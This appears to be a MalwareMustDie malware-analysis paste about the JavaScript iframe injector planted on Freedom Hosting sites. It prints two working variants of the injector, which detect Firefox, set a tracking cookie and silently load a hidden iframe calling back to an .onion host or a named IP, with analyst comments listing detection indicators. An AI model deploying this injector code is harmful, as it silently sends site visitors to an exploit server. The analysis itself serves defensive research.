MalwareMustDie

Freedom Hosting FBI IFRAME Redirector Malware Script

Aug 12th, 2014
  1. # MalwareMustDie!
  2. # This is the malicious Javascript set codes injected to the Freedom Hosting site
  3. # It contains the IFRAMER malware method to redirect the victim to the infector site, at url:
  4. # http://nl7qbezu7pqsuone.onion?requestID=203f1a01-6bc7-4c8b-b0be-2726a7a3cbd0
  5. #
  6. # Original copy at: www.twitlonger.com/show/n_1rlo0uu
  7. # See the Iframer part and tell me if this is NOT adapting malware techniques, and NOT blindly infecting every visitor to that site!!
  8. # Anyone who accessed an FH site with Firefox & JavaScript enabled must have been affected by this IFRAMER.
  9. # Case: FBI infects malware in public anonymous network http://blog.malwaremustdie.org/2014/08/what-is-bad-stays-bad-legalized-any.html
  10. # Ref: http://www.reddit.com/r/onions/comments/1jmrta/founder_of_the_freedom_hosting_arrested_held/
  11. # Ref: https://www.mozilla.org/security/announce/2013/mfsa2013-53.html
  12. # Ref: http://www.twitlonger.com/show/n_1rlo0uu
  13. # Ref: http://pastebin.com/bu2Ya0n6
  14. # Ref: http://pastebin.com/pmGEj9bV
  15.  
  16. Additional: Analysis of the Magento exploit payload used to infect Tor visitors leads to the SAME IP:
  17. # Ref: https://pastebin.com/RTwsyrH8
  18. # Ref: https://pastebin.com/aFUP2gLB
  19.  
  20.  
  21. // Case 1
  22.  
  23.     function createCookie(name,value,minutes) {
  24.             if (minutes) {
  25.                     var date = new Date();
  26.                     date.setTime(date.getTime()+(minutes*60*1000));
  27.                     var expires = "; expires="+date.toGMTString();
  28.             }
  29.             else var expires = "";
  30.             document.cookie = name+"="+value+expires+"; path=/";
  31.     }
  32.      
    // Returns the raw value of the cookie called `name`, or null when absent.
    // Splits document.cookie on ';', strips leading spaces from each entry and
    // returns the remainder of the first entry that starts with "name=".
    // No URL-decoding is applied.
    function readCookie(name) {
        var nameEQ = name + "=";
        var ca = document.cookie.split(';');
        for(var i=0;i < ca.length;i++) {
            var c = ca[i];
            while (c.charAt(0)==' ') c = c.substring(1,c.length); // trim leading spaces left by "; " separators
            if (c.indexOf(nameEQ) == 0) return c.substring(nameEQ.length,c.length);
        }
        return null;
    }
  43.      
    // Browser gate: true when the page runs in a Firefox/Gecko browser.
    // Probes two Gecko-only DOM properties (document.getBoxObjectFor,
    // window.mozInnerScreenX) and falls back to a case-insensitive "Firefox"
    // match on the user-agent string.
    // Analyst note: this is the targeting step — the iframe is only injected
    // for Firefox visitors, consistent with the header's statement that Firefox
    // users with JavaScript enabled were affected. For detection, the pair of
    // Gecko property probes immediately followed by iframe creation is a
    // usable signature for this injector family.
    function isFF() {
        return (document.getBoxObjectFor != null || window.mozInnerScreenX != null || /Firefox/i.test(navigator.userAgent));
    }
  47.      
    // Payload delivery: builds a 5px-high, borderless, non-scrolling iframe
    // pointing at the .onion callback URL (fixed requestID) and appends it to
    // <body>. It runs on page readiness (see isReady), so no user interaction
    // is needed.
    // Detection: a dynamically created <iframe> with frameBorder "0", height
    // "5" and a src carrying a GUID-style requestID is the DOM/proxy-log
    // indicator to hunt for. The host and requestID below are this page's IoCs.
    function updatify() {
        var iframe = document.createElement('iframe');
        iframe.style.display = "inline";
        iframe.frameBorder = "0";
        iframe.scrolling = "no";
        iframe.src = "http://nl7qbezu7pqsuone.onion?requestID=203f1a01-6bc7-4c8b-b0be-2726a7a3cbd0"; // IoC: callback/infector URL named in the header
        iframe.height = "5";
        iframe.width = "*"; // "*" is not a valid width value; presumably ignored by the browser — unverified
        document.body.appendChild(iframe);
    }
  58.      
    // Once-per-cookie-lifetime gate: if the "n_serv" cookie is absent, set it
    // to the requestID for 30 minutes and inject the iframe. A returning
    // visitor inside that window gets no second iframe.
    // Forensic note: an "n_serv" cookie holding this requestID in a browser
    // profile is an artifact of having been served the injection.
    function format_quick() {
        if ( ! readCookie("n_serv") ) {
            createCookie("n_serv", "203f1a01-6bc7-4c8b-b0be-2726a7a3cbd0", 30);
            updatify();
        }
    }
  65.      
    // Readiness poll: re-arms itself every 250 ms until document.readyState is
    // "interactive" or "complete", then runs the Firefox check and, if it
    // passes, the cookie-gated injection. There is no else branch for
    // non-Firefox browsers, so those visitors see nothing.
    function isReady()
    {
        if ( document.readyState === "interactive" || document.readyState === "complete" ) {

            if ( isFF() ) {
                format_quick();
            }
        }
        else
        {
            setTimeout(isReady, 250);
        }
    }
    // Kick-off: first readiness check 250 ms after the injected script executes.
    setTimeout(isReady, 250);
  80.  
  81.  
  82. // Case 2
  83.  
// Writes the cookie `name=value` scoped to path "/". A truthy `minutes` sets
// an expiry that many minutes ahead; a falsy value (including 0) yields a
// session cookie. Same logic as Case 1, only reformatted.
function createCookie(name, value, minutes) {
    if (minutes) {
        var date = new Date();
        date.setTime(date.getTime() + (minutes * 60 * 1000));
        var expires = "; expires=" + date.toGMTString();
    } else var expires = ""; // function-scoped `var`: both branches define the same binding
    document.cookie = name + "=" + value + expires + "; path=/";
}
  92.  
// Returns the raw value of the cookie called `name`, or null when absent.
// Splits document.cookie on ';', trims leading spaces from each entry and
// returns the remainder of the first entry starting with "name=".
function readCookie(name) {
    var nameEQ = name + "=";
    var ca = document.cookie.split(';');
    for (var i = 0; i < ca.length; i++) {
        var c = ca[i];
        while (c.charAt(0) == ' ') c = c.substring(1, c.length);
        if (c.indexOf(nameEQ) == 0) return c.substring(nameEQ.length, c.length);
    }
    return null;
}
  103.  
// Browser gate: Gecko-only DOM property probes (document.getBoxObjectFor,
// window.mozInnerScreenX) plus a case-insensitive "Firefox" user-agent match.
// Identical to Case 1; the payload is only delivered to Firefox visitors.
function isFF() {
    return (document.getBoxObjectFor != null || window.mozInnerScreenX != null || /Firefox/i.test(navigator.userAgent));
}
  107.  
// Payload delivery, Case 2 variant. Same 5px borderless iframe as Case 1, but
// the src is a clearnet IP address (65.222.202.53, attributed below to
// Verizon Business) with a different requestID instead of the .onion host.
// Detection: outbound requests to that IP with a "requestID=" query string,
// and dynamically appended iframes with height "5" / frameBorder "0".
function updatify() {
    var iframe = document.createElement('iframe');
    iframe.style.display = "inline";
    iframe.frameBorder = "0";
    iframe.scrolling = "no";
    iframe.src = "http://65.222.202.53/?requestID=eb5f2c80-fc81-11e2-b778-0800200c9a66"; <== (1) 1ST CALLBACK SELF EXPLANATORY
    iframe.height = "5";
    iframe.width = "*"; // "*" is not a valid width value; presumably ignored — unverified
    document.body.appendChild(iframe);
}
  118.  
// Cookie-gated trigger (Case 2 name for Case 1's format_quick): when no
// "n_serv" cookie exists, store the requestID for 30 minutes and inject the
// iframe, so each visitor is served at most once per cookie lifetime.
function freedomhost() {
    if (!readCookie("n_serv")) {
        createCookie("n_serv", "eb5f2c80-fc81-11e2-b778-0800200c9a66", 30);
        updatify();
    }
}
  125.  
// Readiness poll: re-arms every 250 ms until the DOM is "interactive" or
// "complete", then runs the Firefox check and, if it passes, freedomhost().
// The commented-out alert is a leftover debug line in the sample; it would
// have made the Firefox detection visible, so its removal keeps the
// injection silent.
function isReady() {
    if (document.readyState === "interactive" || document.readyState === "complete") {
        if (isFF()) {
            //window.alert(window.location + "Firefox Detected.")
            freedomhost();
        }
    } else {
        setTimeout(isReady, 250);
    }
}
// Kick-off: first readiness check 250 ms after the injected script executes.
setTimeout(isReady, 250);
  137.  
  138. // Noted, same method,
  139. // the second script calls back to a plain IP address; info on the remote host marked (1):
  140.  
  141.   IP Address: 65.222.202.53
  142.   City: Triadelphia
  143.   State or Region: West Virginia
  144.   Country: United States
  145.   ISP: Verizon Business
  146.   Latitude & Longitude: 40.0900, -80.6220
  147.   Domain: verizonbusiness.com
  148.   ZIP Code: 26059
  149.  
  150. ---
  151. #MalwareMustDie! @unixfreaxjp